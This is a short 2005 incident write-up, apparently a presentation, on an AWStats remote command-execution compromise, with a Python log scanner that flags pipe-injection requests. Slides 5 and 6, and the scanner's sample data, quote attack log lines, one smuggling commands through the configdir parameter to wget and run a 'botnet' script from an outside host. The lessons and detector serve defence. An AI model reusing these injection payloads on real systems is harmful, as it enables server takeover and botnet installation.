The Anatomy of a Hack


  1. The Anatomy of a Hack March 2005

  2. The vulnerabilities…
     • 2005-02-25: AWStats Plugin Multiple Remote Command Execution Vulnerabilities
     • 2005-02-16: AWStats Logfile Parameter Remote Command Execution Vulnerability
     • 2005-02-16: AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
     • 2005-02-16: AWStats Remote Command Execution Vulnerability
     • 2005-02-14: AWStats Debug Remote Information Disclosure Vulnerability
     • 2005-01-15: AWStats Multiple Unspecified Remote Input Validation Vulnerabilities

  3. AWStats Multiple Unspecified Remote Input Validation Vulnerabilities (15 Jan)
     • Multiple unspecified remote input validation vulnerabilities affect AWStats. These issues are due to a failure of the application to perform proper validation on user-supplied input prior to using it to carry out some critical function.
     • Although unconfirmed, an attacker may leverage these issues to execute commands and disclose sensitive information with the privileges of the underlying Web server.

  4. AWStats Remote Command Execution Vulnerability (16 Feb)
     • AWStats is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
     • An attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server through a URI parameter.

  5. The First Probe…
     [05/Mar/2005:01:29:55 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

  6. The Exploit…
     [13/Mar/2005:19:17:12 -0600] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;killall%20%20perl;cd%20/tmp;wget%20ssh.a.la/botnet;perl%20botnet;rm%20botnet;echo%20;echo| HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

  7. Results of Exploits
     • Left lots of litter in /tmp
     • Opened up multiple listeners (est. 6)
     • Most were botnet daemons or backdoors
     • Clean up has been fun and educational
     • No damage to the system, just had my ego dinged up a little
     • Valuable reminder – Don’t get complacent

  8. How I could have prevented it
     • Stay on top of vulnerabilities
     • They are always shortly followed by exploits
     • Patch/Upgrade as soon as possible
     • Review logs and check your file systems
     • I.e. /tmp would have been an easy tip-off
     • Know what listeners are running and check them regularly
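
The log review recommended in slide 8, applied to the '|' pattern from slides 4 to 6, can be automated. The following is an added example, not part of the original presentation: it flags awstats.pl requests whose decoded parameter values contain a pipe and separates the 404 probe from the 200 hit. The function names, the verdict labels and the two sample lines marked as constructed are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Match from the timestamp onward so a line works with or without the
# leading client fields of an Apache combined-format entry.
LOG_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')

def verdict(status):
    # Assumption: 404 means the script was not at that path, 200 means it ran.
    if status == 404:
        return "probe-not-found"
    if status == 200:
        return "served-investigate-host"
    return "rejected-or-error"

def classify(line):
    """Return a finding for a pipe-injection attempt on awstats.pl, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    path, _, query = m["uri"].partition("?")
    if not path.lower().endswith("awstats.pl"):
        return None
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if "|" in unquote_plus(raw):  # decode first: %7C is also a pipe
            status = int(m["status"])
            return {"ts": m["ts"], "method": m["method"], "param": name,
                    "status": status, "verdict": verdict(status)}
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [f for f in (classify(line) for line in lines) if f]

SAMPLE = [
    # The two entries shown in slides 5 and 6.
    '[05/Mar/2005:01:29:55 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '[13/Mar/2005:19:17:12 -0600] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;killall%20%20perl;cd%20/tmp;wget%20ssh.a.la/botnet;perl%20botnet;rm%20botnet;echo%20;echo| HTTP/1.0" 200 414 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    # Constructed: an ordinary report request, then a percent-encoded probe.
    '[13/Mar/2005:19:20:01 -0600] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '[14/Mar/2005:02:00:00 -0600] "GET /cgi-bin/awstats.pl?configdir=%7Cid%7C HTTP/1.0" 403 210 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding["ts"], finding["method"], finding["param"], finding["verdict"])
```

A "served-investigate-host" finding is the cue for the other checks in slide 8: look at /tmp and at the listeners running on the host.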